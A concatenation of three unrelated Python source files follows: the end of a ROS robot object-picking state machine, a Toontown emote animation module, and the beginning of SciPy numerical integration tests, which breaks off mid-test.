remapping={'objectID': 'ID'})
# x:261 y:239
OperatableStateMachine.add('Get closer',
_sm_get_closer_1,
transitions={'done': 'Action_find'},
autonomy={'done': Autonomy.Inherit},
remapping={'Object': 'Object'})
# x:275 y:333
OperatableStateMachine.add('for 1',
ForLoop(repeat=1),
transitions={'do': 'Get closer', 'end': 'say giveup'},
autonomy={'do': Autonomy.Off, 'end': Autonomy.Off},
remapping={'index': 'index'})
# x:416 y:264
OperatableStateMachine.add('say giveup',
SaraSay(sentence="I give up", input_keys=[], emotion=1, block=True),
transitions={'done': 'cause4'},
autonomy={'done': Autonomy.Off})
# x:284 y:496
OperatableStateMachine.add('say missed',
SaraSay(sentence="Oops! I missed.", input_keys=[], emotion=1, block=True),
transitions={'done': 'cause4'},
autonomy={'done': Autonomy.Off})
# x:469 y:495
OperatableStateMachine.add('set param',
SetRosParam(ParamName="behavior/GripperContent"),
transitions={'done': 'finished'},
autonomy={'done': Autonomy.Off},
remapping={'Value': 'ObjectName'})
# x:82 y:115
OperatableStateMachine.add('get name',
CalculationState(calculation=lambda x: x[1]),
transitions={'done': 'Action_find'},
autonomy={'done': Autonomy.Off},
remapping={'input_value': 'Action', 'output_value': 'ObjectName'})
# x:511 y:20
OperatableStateMachine.add('cause1',
SetKey(Value="My gripper was already full."),
transitions={'done': 'setrosparam'},
autonomy={'done': Autonomy.Off},
remapping={'Key': 'Key'})
# x:512 y:81
OperatableStateMachine.add('cause2',
SetKey(Value="I didn't know what to pick."),
transitions={'done': 'setrosparam'},
autonomy={'done': Autonomy.Off},
remapping={'Key': 'Key'})
# x:511 y:143
OperatableStateMachine.add('cause3',
SetKey(Value="I didn't found the object."),
transitions={'done': 'setrosparam'},
autonomy={'done': Autonomy.Off},
remapping={'Key': 'Key'})
# x:690 y:197
OperatableStateMachine.add('setrosparam',
SetRosParam(ParamName="behavior/GPSR/CauseOfFailure"),
transitions={'done': 'failed'},
autonomy={'done': Autonomy.Off},
remapping={'Value': 'Key'})
# x:605 y:312
OperatableStateMachine.add('cause4',
SetKey(Value="I was unable to pick the object."),
transitions={'done': 'setrosparam'},
autonomy={'done': Autonomy.Off},
remapping={'Key': 'Key'})
# x:30 y:188
OperatableStateMachine.add('Action_find',
self.use_behavior(Action_findSM, 'Action_find'),
transitions={'done': 'getID', 'failed': 'cause3'},
autonomy={'done': Autonomy.Inherit, 'failed': Autonomy.Inherit},
remapping={'className': 'ObjectName', 'entity': 'Object'})
# x:49 y:322
OperatableStateMachine.add('getID',
CalculationState(calculation=lambda x: x.ID),
transitions={'done': 'Action_pick'},
autonomy={'done': Autonomy.Off},
remapping={'input_value': 'Object', 'output_value': 'ID'})
# x:284 y:422
OperatableStateMachine.add('Say_lost',
SaraSay(sentence=lambda x: "Hum! I lost sight of the "+x, input_keys=[], emotion=0, block=True),
transitions={'done': 'cause4'},
autonomy={'done': Autonomy.Off})
# x:281 y:572
OperatableStateMachine.add('Got_It',
SaraSay(sentence=lambda x: "I have the "+x, input_keys=[], emotion=0, block=True),
transitions={'done': 'set param'},
autonomy={'done': Autonomy.Off})
return _state_machine
# Private functions can be added inside the following tags
# [MANUAL_FUNC]
# [/MANUAL_FUNC]
|
|
from direct.directnotify import DirectNotifyGlobal
from direct.interval.IntervalGlobal import *
from direct.showbase import PythonUtil
from pandac.PandaModules import *
import random
import types
import Toon, ToonDNA
from otp.avatar import Emote
from otp.otpbase import OTPLocalizer
from toontown.chat.ChatGlobals import *
from toontown.nametag.NametagGlobals import *
from toontown.toonbase import TTLocalizer
EmoteSleepIndex = 4
EmoteClear = -1
def doVictory(toon, volume = 1):
duration = toon.getDuration('victory', 'legs')
sfx = base.loadSfx('phase_3.5/audio/sfx/ENC_Win.ogg')
sfxDuration = duration - 1.0
sfxTrack = SoundInterval(sfx, loop=1, duration=sfxDuration, node=toon, volume=volume)
track = Sequence(Func(toon.play, 'victory'), sfxTrack, duration=0)
return (track, duration, None)
def doJump(toon, volume = 1):
track = Sequence(Func(toon.play, 'jump'))
return (track, 0, None)
def doDead(toon, volume = 1):
toon.animFSM.request('Sad')
return (None, 0, None)
def doAnnoyed(toon, volume = 1):
duration = toon.getDuration('angry', 'torso')
sfx = None
if toon.style.getAnimal() == 'bear':
sfx = base.loadSfx('phase_3.5/audio/dial/AV_bear_exclaim.ogg')
else:
sfx = base.loadSfx('phase_3.5/audio/sfx/avatar_emotion_angry.ogg')
def playSfx():
base.playSfx(sfx, volume=volume, node=toon)
track = Sequence(Func(toon.angryEyes), Func(toon.blinkEyes), Func(toon.play, 'angry'), Func(playSfx))
exitTrack = Sequence(Func(toon.normalEyes), Func(toon.blinkEyes))
return (track, duration, exitTrack)
def doAngryEyes(toon, volume = 1):
track = Sequence(Func(toon.angryEyes), Func(toon.blinkEyes), Wait(10.0), Func(toon.normalEyes))
return (track, 0.1, None)
def doHappy(toon, volume = 1):
track = Sequence(Func(toon.play, 'jump'), Func(toon.normalEyes), Func(toon.blinkEyes))
duration = toon.getDuration('jump', 'legs')
return (track, duration, None)
def doSad(toon, volume = 1):
track = Sequence(Func(toon.sadEyes), Func(toon.blinkEyes))
exitTrack = Sequence(Func(toon.normalEyes), Func(toon.blinkEyes))
return (track, 3, exitTrack)
def doSleep(toon, volume = 1):
duration = 4
track = Sequence(Func(toon.stopLookAround), Func(toon.stopBlink), Func(toon.closeEyes), Func(toon.lerpLookAt, Point3(0, 1, -4)), Func(toon.loop, 'neutral'), Func(toon.setPlayRate, 0.4, 'neutral'), Func(toon.setChatAbsolute, TTLocalizer.ToonSleepString, CFThought))
def wakeUpFromSleepEmote():
toon.startLookAround()
toon.openEyes()
toon.startBlink()
toon.setPlayRate(1, 'neutral')
if toon.nametag.getChatText() == TTLocalizer.ToonSleepString:
toon.clearChat()
toon.lerpLookAt(Point3(0, 1, 0), time=0.25)
exitTrack = Sequence(Func(wakeUpFromSleepEmote))
return (track, duration, exitTrack)
def doYes(toon, volume = 1):
tracks = Parallel(autoFinish=1)
for lod in toon.getLODNames():
h = toon.getPart('head', lod)
tracks.append(Sequence(LerpHprInterval(h, 0.1, Vec3(0, -30, 0)), LerpHprInterval(h, 0.15, Vec3(0, 20, 0)), LerpHprInterval(h, 0.15, Vec3(0, -20, 0)), LerpHprInterval(h, 0.15, Vec3(0, 20, 0)), LerpHprInterval(h, 0.15, Vec3(0, -20, 0)), LerpHprInterval(h, 0.15, Vec3(0, 20, 0)), LerpHprInterval(h, 0.1, Vec3(0, 0, 0))))
tracks.start()
return (None, 0, None)
def doNo(toon, volume = 1):
tracks = Parallel(autoFinish=1)
for lod in toon.getLODNames():
h = toon.getPart('head', lod)
tracks.append(Sequence(LerpHprInterval(h, 0.1, Vec3(40, 0, 0)), LerpHprInterval(h, 0.15, Vec3(-40, 0, 0)), LerpHprInterval(h, 0.15, Vec3(40, 0, 0)), LerpHprInterval(h, 0.15, Vec3(-40, 0, 0)), LerpHprInterval(h, 0.15, Vec3(20, 0, 0)), LerpHprInterval(h, 0.15, Vec3(-20, 0, 0)), LerpHprInterval(h, 0.1, Vec3(0, 0, 0))))
tracks.start()
return (None, 0, None)
def doOk(toon, volume = 1):
return (None, 0, None)
def doShrug(toon, volume = 1):
sfx = base.loadSfx('phase_3.5/audio/sfx/avatar_emotion_shrug.ogg')
def playSfx():
base.playSfx(sfx, volume=volume, node=toon)
track = Sequence(Func(toon.play, 'shrug'), Func(playSfx))
duration = toon.getDuration('shrug', 'torso')
return (track, duration, None)
def doWave(toon, volume = 1):
track = Sequence(Func(toon.play, 'wave'))
duration = toon.getDuration('wave', 'torso')
return (track, duration, None)
def doApplause(toon, volume = 1):
sfx = base.loadSfx('phase_4/audio/sfx/avatar_emotion_applause.ogg')
def playSfx():
base.playSfx(sfx, volume=1, node=toon)
track = Sequence(Func(toon.play, 'applause'), Func(playSfx))
duration = toon.getDuration('applause', 'torso')
return (track, duration, None)
def doConfused(toon, volume = 1):
sfx = base.loadSfx('phase_4/audio/sfx/avatar_emotion_confused.ogg')
def playSfx():
base.playSfx(sfx, node=toon, volume=volume)
track = Sequence(Func(toon.play, 'confused'), Func(playSfx))
duration = toon.getDuration('confused', 'torso')
return (track, duration, None)
def doSlipForward(toon, volume = 1):
sfx = base.loadSfx('phase_4/audio/sfx/MG_cannon_hit_dirt.ogg')
def playSfx():
base.playSfx(sfx, volume=volume, node=toon)
sfxDelay = 0.7
track = Sequence(Func(toon.play, 'slip-forward'), Wait(sfxDelay), Func(playSfx))
duration = toon.getDuration('slip-forward', 'torso') - sfxDelay
return (track, duration, None)
def doBored(toon, volume = 1):
sfx = base.loadSfx('phase_4/audio/sfx/avatar_emotion_bored.ogg')
def playSfx():
base.playSfx(sfx, volume=volume, node=toon)
sfxDelay = 2.2
track = Sequence(Func(toon.play, 'bored'), Wait(sfxDelay), Func(playSfx))
duration = toon.getDuration('bored', 'torso') - sfxDelay
return (track, duration, None)
def doBow(toon, volume = 1):
if toon.style.torso[1] == 'd':
track = Sequence(Func(toon.play, 'curtsy'))
duration = toon.getDuration('curtsy', 'torso')
else:
track = Sequence(Func(toon.play, 'bow'))
duration = toon.getDuration('bow', 'torso')
return (track, duration, None)
def doSlipBackward(toon, volume = 1):
sfx = base.loadSfx('phase_4/audio/sfx/MG_cannon_hit_dirt.ogg')
def playSfx():
base.playSfx(sfx, volume=volume, node=toon)
sfxDelay = 0.7
track = Sequence(Func(toon.play, 'slip-backward'), Wait(sfxDelay), Func(playSfx))
duration = toon.getDuration('slip-backward', 'torso') - sfxDelay
return (track, duration, None)
def doThink(toon, volume = 1):
duration = 47.0 / 24.0 * 2
animTrack = Sequence(ActorInterval(toon, 'think', startFrame=0, endFrame=46), ActorInterval(toon, 'think', startFrame=46, endFrame=0))
track = Sequence(animTrack, duration=0)
return (track, duration, None)
def doCringe(toon, volume = 1):
track = Sequence(Func(toon.play, 'cringe'))
duration = toon.getDuration('cringe', 'torso')
return (track, duration, None)
def doResistanceSalute(toon, volume=1):
track = Sequence(
Func(toon.setChatAbsolute, OTPLocalizer.CustomSCStrings[4020], CFSpeech|CFTimeout),
Func(toon.setPlayRate, 0.75, 'victory'),
Func(toon.pingpong, 'victory', fromFrame=0, toFrame=9),
Func(toon.setPlayRate, 1, 'victory')
)
duration = 20 / toon.getFrameRate('victory')
return (track, duration, None)
def doNothing(toon, volume = 1):
return (None, 0, None)
def doSurprise(toon, volume = 1):
sfx = None
sfx = base.loadSfx('phase_4/audio/sfx/avatar_emotion_surprise.ogg')
def playSfx(volume = 1):
base.playSfx(sfx, volume=volume, node=toon)
def playAnim(anim):
anim.start()
def stopAnim(anim):
anim.finish()
toon.stop()
sfx.stop()
anim = Sequence(ActorInterval(toon, 'conked', startFrame=9, endFrame=50), ActorInterval(toon, 'conked', startFrame=70, endFrame=101))
track = Sequence(Func(toon.stopBlink), Func(toon.surpriseEyes), Func(toon.showSurpriseMuzzle), Parallel(Func(playAnim, anim), Func(playSfx, volume)))
exitTrack = Sequence(Func(toon.hideSurpriseMuzzle), Func(toon.openEyes), Func(toon.startBlink), Func(stopAnim, anim))
return (track, 3.0, exitTrack)
def doUpset(toon, volume = 1):
sfxList = ('phase_4/audio/sfx/avatar_emotion_very_sad_1.ogg', 'phase_4/audio/sfx/avatar_emotion_very_sad.ogg')
sfx = base.loadSfx(random.choice(sfxList))
def playSfx(volume = 1):
base.playSfx(sfx, volume=volume, node=toon)
def playAnim(anim):
anim.start()
def stopAnim(anim):
anim.finish()
toon.stop()
sfx.stop()
anim = Sequence(ActorInterval(toon, 'bad-putt', startFrame=29, endFrame=59, playRate=-0.75), ActorInterval(toon, 'bad-putt', startFrame=29, endFrame=59, playRate=0.75))
track = Sequence(Func(toon.sadEyes), Func(toon.blinkEyes), Func(toon.showSadMuzzle), Parallel(Func(playAnim, anim), Func(playSfx, volume)))
exitTrack = Sequence(Func(toon.hideSadMuzzle), Func(toon.normalEyes), Func(stopAnim, anim))
return (track, 4.0, exitTrack)
def doDelighted(toon, volume = 1):
sfx = None
sfx = base.loadSfx('phase_4/audio/sfx/delighted_06.ogg')
def playSfx(volume = 1):
base.playSfx(sfx, volume=volume, node=toon)
def playAnim(anim):
anim.start()
def stopAnim(anim):
anim.finish()
toon.stop()
sfx.stop()
anim = Sequence(ActorInterval(toon, 'left'), Wait(1), ActorInterval(toon, 'left', playRate=-1))
track = Sequence(Func(toon.blinkEyes), Func(toon.showSmileMuzzle), Parallel(Func(playAnim, anim), Func(playSfx, volume)))
exitTrack = Sequence(Func(toon.hideSmileMuzzle), Func(toon.blinkEyes), Func(stopAnim, anim))
return (track, 2.5, exitTrack)
def doFurious(toon, volume = 1):
duration = toon.getDuration('angry', 'torso')
sfx = None
sfx = base.loadSfx('phase_4/audio/sfx/furious_03.ogg')
def playSfx(volume = 1):
base.playSfx(sfx, volume=volume, node=toon)
track = Sequence(Func(toon.angryEyes), Func(toon.blinkEyes), Func(toon.showAngryMuzzle), Func(toon.play, 'angry'), Func(playSfx, volume))
exitTrack = Sequence(Func(toon.normalEyes), Func(toon.blinkEyes), Func(toon.hideAngryMuzzle))
return (track, duration, exitTrack)
def doLaugh(toon, volume = 1):
sfx = None
sfx = base.loadSfx('phase_4/audio/sfx/avatar_emotion_laugh.ogg')
def playSfx(volume = 1):
base.playSfx(sfx, volume=volume, node=toon)
def playAnim():
toon.setPlayRate(10, 'neutral')
toon.loop('neutral')
def stopAnim():
toon.setPlayRate(1, 'neutral')
track = Sequence(Func(toon.blinkEyes), Func(toon.showLaughMuzzle), Func(playAnim), Func(playSfx, volume))
exitTrack = Sequence(Func(toon.hideLaughMuzzle), Func(toon.blinkEyes), Func(stopAnim))
return (track, 2, exitTrack)
def doTaunt(toon, volume=1):
sfx = base.loadSfx('phase_4/audio/sfx/avatar_emotion_taunt.ogg')
track = Sequence(
Func(toon.blinkEyes),
Func(toon.play, 'taunt'),
Func(base.playSfx, sfx, volume=volume, node=toon)
)
duration = toon.getDuration('taunt')
return (track, duration, None)
def getSingingNote(toon, note, volume = 1):
sfx = None
filePath = 'phase_3.5/audio/dial/'
filePrefix = 'tt_s_dlg_sng_'
fileSuffix = '.ogg'
speciesName = ToonDNA.getSpeciesName(toon.style.head)
sfx = base.loadSfx(filePath + filePrefix + speciesName + '_' + note + fileSuffix)
def playSfx(volume = 1):
base.playSfx(sfx, volume=volume, node=toon)
def playAnim():
toon.loop('neutral')
def stopAnim():
toon.setPlayRate(1, 'neutral')
track = Sequence(Func(toon.showSurpriseMuzzle), Parallel(Func(playAnim), Func(playSfx, volume)))
exitTrack = Sequence(Func(toon.hideSurpriseMuzzle), Func(stopAnim))
return (track, 0.1, exitTrack)
def playSingingAnim(toon):
pass
def stopSinginAnim(toon):
pass
def singNote1(toon, volume = 1):
if base.config.GetBool('want-octaves', True):
if toon.style.getTorsoSize() == 'short':
return getSingingNote(toon, 'g1')
elif toon.style.getTorsoSize() == 'medium':
return getSingingNote(toon, 'g2')
elif toon.style.getTorsoSize() == 'long':
return getSingingNote(toon, 'g3')
def singNote2(toon, volume = 1):
if base.config.GetBool('want-octaves', True):
if toon.style.getTorsoSize() == 'short':
return getSingingNote(toon, 'a1')
elif toon.style.getTorsoSize() == 'medium':
return getSingingNote(toon, 'a2')
elif toon.style.getTorsoSize() == 'long':
return getSingingNote(toon, 'a3')
def singNote3(toon, volume = 1):
if base.config.GetBool('want-octaves', True):
if toon.style.getTorsoSize() == 'short':
return getSingingNote(toon, 'b1')
elif toon.style.getTorsoSize() == 'medium':
return getSingingNote(toon, 'b2')
elif toon.style.getTorsoSize() == 'long':
return getSingingNote(toon, 'b3')
def singNote4(toon, volume = 1):
if base.config.GetBool('want-octaves', True):
if toon.style.getTorsoSize() == 'short':
return getSingingNote(toon, 'c1')
elif toon.style.getTorsoSize() == 'medium':
return getSingingNote(toon, 'c2')
elif toon.style.getTorsoSize() == 'long':
return getSingingNote(toon, 'c3')
def singNote5(toon, volume = 1):
if base.config.GetBool('want-octaves', True):
if toon.style.getTorsoSize() == 'short':
return getSingingNote(toon, 'd1')
elif toon.style.getTorsoSize() == 'medium':
return getSingingNote(toon, 'd2')
elif toon.style.getTorsoSize() == 'long':
return getSingingNote(toon, 'd3')
def singNote6(toon, volume = 1):
if base.config.GetBool('want-octaves', True):
if toon.style.getTorsoSize() == 'short':
return getSingingNote(toon, 'e1')
elif toon.style.getTorsoSize() == 'medium':
return getSingingNote(toon, 'e2')
elif toon.style.getTorsoSize() == 'long':
return getSingingNote(toon, 'e3')
def singNote7(toon, volume = 1):
if base.config.GetBool('want-octaves', True):
if toon.style.getTorsoSize() == 'short':
return getSingingNote(toon, 'f1')
elif toon.style.getTorsoSize() == 'medium':
return getSingingNote(toon, 'f2')
elif toon.style.getTorsoSize() == 'long':
return getSingingNote(toon, 'f3')
def singNote8(toon, volume = 1):
if base.config.GetBool('want-octaves', True):
if toon.style.getTorsoSize() == 'short':
return getSingingNote(toon, 'g2')
elif toon.style.getTorsoSize() == 'medium':
return getSingingNote(toon, 'g3')
elif toon.style.getTorsoSize() == 'long':
return getSingingNote(toon, 'g4')
def singNoteEmpty(toon, volume = 0):
track = Sequence()
return (track, 0.1, None)
def returnToLastAnim(toon):
if hasattr(toon, 'playingAnim') and toon.playingAnim:
toon.loop(toon.playingAnim)
elif not hasattr(toon, 'hp') or toon.hp > 0:
toon.loop('neutral')
else:
toon.loop('sad-neutral')
EmoteFunc = [[doWave, 0],
[doHappy, 0],
[doSad, 0],
[doAnnoyed, 0],
[doSleep, 0],
[doShrug, 0],
[doVictory, 0],
[doThink, 0],
[doBored, 0],
[doApplause, 0],
[doCringe, 0],
[doConfused, 0],
[doSlipForward, 0],
[doBow, 0],
[doSlipBackward, 0],
[doResistanceSalute, 0],
[doNothing, 0],
[doYes, 0],
[doNo, 0],
[doOk, 0],
[doSurprise, 0],
[doUpset, 0],
[doDelighted, 0],
[doFurious, 0],
[doLaugh, 0],
[doTaunt, 0]]
class TTEmote(Emote.Emote):
notify = DirectNotifyGlobal.directNotify.newCategory('TTEmote')
SLEEP_INDEX = 4
def __init__(self):
self.emoteFunc = EmoteFunc
self.bodyEmotes = [0,
1,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
20,
21,
22,
23,
24,
25]
self.headEmotes = [2,
17,
18,
19]
if len(self.emoteFunc) != len(OTPLocalizer.EmoteList):
self.notify.error('Emote.EmoteFunc and OTPLocalizer.EmoteList are different lengths.')
self.track = None
self.stateChangeMsgLocks = 0
self.stateHasChanged = 0
return
def lockStateChangeMsg(self):
self.stateChangeMsgLocks += 1
def unlockStateChangeMsg(self):
if self.stateChangeMsgLocks <= 0:
print PythonUtil.lineTag() + ': someone unlocked too many times'
return
self.stateChangeMsgLocks -= 1
if self.stateChangeMsgLocks == 0 and self.stateHasChanged:
messenger.send(self.EmoteEnableStateChanged)
self.stateHasChanged = 0
def emoteEnableStateChanged(self):
if self.stateChangeMsgLocks > 0:
self.stateHasChanged = 1
else:
messenger.send(self.EmoteEnableStateChanged)
def disableAll(self, toon, msg = None):
if toon != base.localAvatar:
return
self.disableGroup(range(len(self.emoteFunc)), toon)
def releaseAll(self, toon, msg = None):
if toon != base.localAvatar:
return
self.enableGroup(range(len(self.emoteFunc)), toon)
def disableBody(self, toon, msg = None):
if toon != base.localAvatar:
return
self.disableGroup(self.bodyEmotes, toon)
def releaseBody(self, toon, msg = None):
if toon != base.localAvatar:
return
self.enableGroup(self.bodyEmotes, toon)
def disableHead(self, toon, msg = None):
if toon != base.localAvatar:
return
self.disableGroup(self.headEmotes, toon)
def releaseHead(self, toon, msg = None):
if toon != base.localAvatar:
return
self.enableGroup(self.headEmotes, toon)
def getHeadEmotes(self):
return self.headEmotes
def disableGroup(self, indices, toon):
self.lockStateChangeMsg()
for i in indices:
self.disable(i, toon)
self.unlockStateChangeMsg()
def enableGroup(self, indices, toon):
self.lockStateChangeMsg()
for i in indices:
self.enable(i, toon)
self.unlockStateChangeMsg()
def disable(self, index, toon):
if isinstance(index, types.StringType):
index = OTPLocalizer.EmoteFuncDict[index]
self.emoteFunc[index][1] = self.emoteFunc[index][1] + 1
if toon is base.localAvatar:
if self.emoteFunc[index][1] == 1:
self.emoteEnableStateChanged()
def enable(self, index, toon):
if isinstance(index, types.StringType):
index = OTPLocalizer.EmoteFuncDict[index]
self.emoteFunc[index][1] = self.emoteFunc[index][1] - 1
if toon is base.localAvatar:
if self.emoteFunc[index][1] == 0:
self.emoteEnableStateChanged()
def doEmote(self, toon, emoteIndex, ts = 0, volume = 1):
try:
func = self.emoteFunc[emoteIndex][0]
except:
print 'Error in finding emote func %s' % emoteIndex
return (None, None)
def clearEmoteTrack():
base.localAvatar.emoteTrack = None
base.localAvatar.d_setEmoteState(self.EmoteClear, 1.0)
return
if volume == 1:
track, duration, exitTrack = func(toon)
else:
track, duration, exitTrack = func(toon, volume)
if track != None:
track = Sequence(Func(self.disableAll, toon, 'doEmote'), track)
if duration > 0:
track = Sequence(track, Wait(duration))
if exitTrack != None:
track = Sequence(track, exitTrack)
if duration > 0:
track = Sequence(track, Func(returnToLastAnim, toon))
track = Sequence(track, Func(self.releaseAll, toon, 'doEmote'), autoFinish=1)
if toon.isLocal():
track = Sequence(track, Func(clearEmoteTrack))
if track != None:
if toon.emote != None:
toon.emote.finish()
toon.emote = None
toon.emote = track
track.start(ts)
del clearEmoteTrack
return (track, duration)
def printEmoteState(self, action, msg):
pass
Emote.globalEmote = TTEmote()
|
|
from __future__ import division, print_function, absolute_import
import sys
import math
import numpy as np
from numpy import sqrt, cos, sin, arctan, exp, log, pi, Inf
from numpy.testing import (assert_, TestCase, run_module_suite, dec,
assert_allclose, assert_array_less, assert_almost_equal, assert_raises)
from scipy.integrate import quad, dblquad, tplquad, nquad
from scipy._lib.six import xrange
from scipy._lib._ccallback import LowLevelCallable
import ctypes
import ctypes.util
from scipy._lib._ccallback_c import sine_ctypes
import scipy.integrate._test_multivariate as clib_test
def assert_quad(value_and_err, tabled_value, errTol=1.5e-8):
value, err = value_and_err
assert_allclose(value, tabled_value, atol=err, rtol=0)
if errTol is not None:
assert_array_less(err, errTol)
class TestCtypesQuad(TestCase):
def setUp(self):
if sys.platform == 'win32':
if sys.version_info < (3, 5):
files = [ctypes.util.find_msvcrt()]
else:
files = ['api-ms-win-crt-math-l1-1-0.dll']
elif sys.platform == 'darwin':
files = ['libm.dylib']
else:
files = ['libm.so', 'libm.so.6']
for file in files:
try:
self.lib = ctypes.CDLL(file)
break
except OSError:
pass
else:
# This test doesn't work on some Linux platforms (Fedora for
# example) that put an ld script in libm.so - see gh-5370
self.skipTest("Ctypes can't import libm.so")
restype = ctypes.c_double
argtypes = (ctypes.c_double,)
for name in ['sin', 'cos', 'tan']:
func = getattr(self.lib, name)
func.restype = restype
func.argtypes = argtypes
def test_typical(self):
assert_quad(quad(self.lib.sin, 0, 5), quad(math.sin, 0, 5)[0])
assert_quad(quad(self.lib.cos, 0, 5), quad(math.cos, 0, 5)[0])
assert_quad(quad(self.lib.tan, 0, 1), quad(math.tan, 0, 1)[0])
@dec.knownfailureif(True, msg="Unreliable test, see ticket 1684.")
def test_improvement(self):
import time
start = time.time()
for i in xrange(100):
quad(self.lib.sin, 0, 100)
fast = time.time() - start
start = time.time()
for i in xrange(100):
quad(math.sin, 0, 100)
slow = time.time() - start
assert_(fast < 0.5*slow, (fast, slow))
def test_ctypes_sine(self):
quad(LowLevelCallable(sine_ctypes), 0, 1)
def test_ctypes_variants(self):
lib = ctypes.CDLL(clib_test.__file__)
sin_0 = lib._sin_0
sin_0.restype = ctypes.c_double
sin_0.argtypes = [ctypes.c_double, ctypes.c_void_p]
sin_1 = lib._sin_1
sin_1.restype = ctypes.c_double
sin_1.argtypes = [ctypes.c_int, ctypes.POINTER(ctypes.c_double), ctypes.c_void_p]
sin_2 = lib._sin_2
sin_2.restype = ctypes.c_double
sin_2.argtypes = [ctypes.c_double]
sin_3 = lib._sin_3
sin_3.restype = ctypes.c_double
sin_3.argtypes = [ctypes.c_int, ctypes.POINTER(ctypes.c_double)]
sin_4 = lib._sin_3
sin_4.restype = ctypes.c_double
sin_4.argtypes = [ctypes.c_int, ctypes.c_double]
all_sigs = [sin_0, sin_1, sin_2, sin_3, sin_4]
legacy_sigs = [sin_2, sin_4]
legacy_only_sigs = [sin_4]
# LowLevelCallables work for new signatures
for j, func in enumerate(all_sigs):
callback = LowLevelCallable(func)
if func in legacy_only_sigs:
assert_raises(ValueError, quad, callback, 0, pi)
else:
assert_allclose(quad(callback, 0, pi)[0], 2.0)
# Plain ctypes items work only for legacy signatures
for j, func in enumerate(legacy_sigs):
if func in legacy_sigs:
assert_allclose(quad(func, 0, pi)[0], 2.0)
else:
assert_raises(ValueError, quad, func, 0, pi)
class TestMultivariateCtypesQuad(TestCase):
def setUp(self):
self.lib = ctypes.CDLL(clib_test.__file__)
restype = ctypes.c_double
argtypes = (ctypes.c_int, ctypes.c_double)
for name in ['_multivariate_typical', '_multivariate_indefinite',
'_multivariate_sin']:
func = getattr(self.lib, name)
func.restype = restype
func.argtypes = argtypes
def test_typical(self):
# 1) Typical function with two extra arguments:
assert_quad(quad(self.lib._multivariate_typical, 0, pi, (2, 1.8)),
0.30614353532540296487)
def test_indefinite(self):
# 2) Infinite integration limits --- Euler's constant
assert_quad(quad(self.lib._multivariate_indefinite, 0, Inf),
0.577215664901532860606512)
def test_threadsafety(self):
# Ensure multivariate ctypes are threadsafe
def threadsafety(y):
return y + quad(self.lib._multivariate_sin, 0, 1)[0]
assert_quad(quad(threadsafety, 0, 1), 0.9596976941318602)
def test_improvement(self):
def myfunc(x): # Euler's constant integrand
return -exp(-x)*log(x)
import time
start = time.time()
for i in xrange(20):
quad(self.lib._multivariate_indefinite, 0, 100)
fast = time.time() - start
start = time.time()
for i in xrange(20):
quad(myfunc, 0, 100)
slow = time.time() - start
# 2+ times faster speeds generated by nontrivial ctypes
# function (single variable)
assert_(fast < 0.5*slow, (fast, slow))
class TestQuad(TestCase):
def test_typical(self):
# 1) Typical function with two extra arguments:
def myfunc(x, n, z): # Bessel function integrand
return cos(n*x-z*sin(x))/pi
assert_quad(quad(myfunc, 0, pi, (2, 1.8)), 0.30614353532540296487)
def test_indefinite(self):
# 2) Infinite integration limits --- Euler's constant
def myfunc(x): # Euler's constant integrand
return -exp(-x)*log(x)
assert_quad(quad(myfunc, 0, Inf), 0.577215664901532860606512)
def test_singular(self):
# 3) Singular points in region of integration.
def myfunc(x):
if 0 < x < 2.5:
return sin(x)
elif 2.5 <= x <= 5.0:
return exp(-x)
else:
return 0.0
assert_quad(quad(myfunc, 0, 10, points=[2.5, 5.0]),
1 - cos(2.5) + exp(-2.5) - exp(-5.0))
def test_sine_weighted_finite(self):
# 4) Sine weighted integral (finite limits)
def myfunc(x, a):
return exp(a*(x-1))
ome = 2.0**3.4
assert_quad(quad(myfunc, 0, 1, args=20, weight='sin', wvar=ome),
(20*sin(ome)-ome*cos(ome)+ome*exp(-20))/(20**2 + ome**2))
def test_sine_weighted_infinite(self):
# 5) Sine weighted integral (infinite limits)
def myfunc(x, a):
return exp(-x*a)
a = 4.0
ome = 3.0
assert_quad(quad(myfunc, 0, Inf, args=a, weight='sin', wvar=ome),
ome/(a**2 + ome**2))
def test_cosine_weighted_infinite(self):
# 6) Cosine weighted integral (negative infinite limits)
def myfunc(x, a):
return exp(x*a)
a = 2.5
ome = 2.3
assert_quad(quad(myfunc, -Inf, 0, args=a, weight='cos', wvar=ome),
a/(a**2 + ome**2))
def test_algebraic_log_weight(self):
# 6) Algebraic-logarithmic weight.
def myfunc(x, a):
return 1/(1+x+2**(-a))
a = 1.5
assert_quad(quad(myfunc, -1, 1, args=a, weight='alg',
wvar=(-0.5, -0.5)),
pi/sqrt((1+2**(-a))**2 - 1))
def test_cauchypv_weight(self):
# 7) Cauchy prinicpal value weighting w(x) = 1/(x-c)
def myfunc(x, a):
return 2.0**(-a)/((x-1)**2+4.0**(-a))
a = 0.4
tabledValue = ((2.0**(-0.4)*log(1.5) -
2.0**(-1.4)*log((4.0**(-a)+16) / (4.0**(-a)+1)) -
arctan(2.0**(a+2)) -
arctan(2.0**a)) /
(4.0**(-a) + 1))
assert_quad(quad(myfunc, 0, 5, args=0.4, weight='cauchy', wvar=2.0),
tabledValue, errTol=1.9e-8)
def test_double_integral(self):
# 8) Double Integral test
def simpfunc(y, x): # Note order of arguments.
return x+y
a, b = 1.0, 2.0
assert_quad(dblquad(simpfunc, a, b, lambda x: x, lambda x: 2*x),
5/6.0 * (b**3.0-a**3.0))
def test_double_integral2(self):
def func(x0, x1, t0, t1):
return x0 + x1 + t0 + t1
g = lambda x: x
h = lambda x: 2 * x
args = 1, 2
assert_quad(dblquad(func, 1, 2, g, h, args=args),35./6 + 9*.5)
def test_triple_integral(self):
# 9) Triple Integral test
def simpfunc(z, y, x, t): # Note order of arguments.
return (x+y+z)*t
a, b = 1.0, 2.0
assert_quad(tplquad(simpfunc, a, b,
lambda x: x, lambda x: 2*x,
lambda x, y: x - y, lambda x, y: x + y,
(2.,)),
2*8/3.0 * (b**4.0 - a**4.0))
class TestNQuad(TestCase):
def test_fixed_limits(self):
def func1(x0, x1, x2, x3):
val = (x0**2 + x1*x2 - x3**3 + np.sin(x0) +
(1 if (x0 - 0.2*x3 - 0.5 - 0.25*x1 > 0) else 0))
return val
def opts_basic(*args):
return {'points': [0.2*args[2] + 0.5 + 0.25*args[0]]}
res = nquad(func1, [[0, 1], [-1, 1], [.13, .8], [-.15, 1]],
opts=[opts_basic, {}, {}, {}], full_output=True)
assert_quad(res[:-1], 1.5267454070738635)
assert_(res[-1]['neval'] > 0 and res[-1]['neval'] < 4e5)
def test_variable_limits(self):
scale = .1
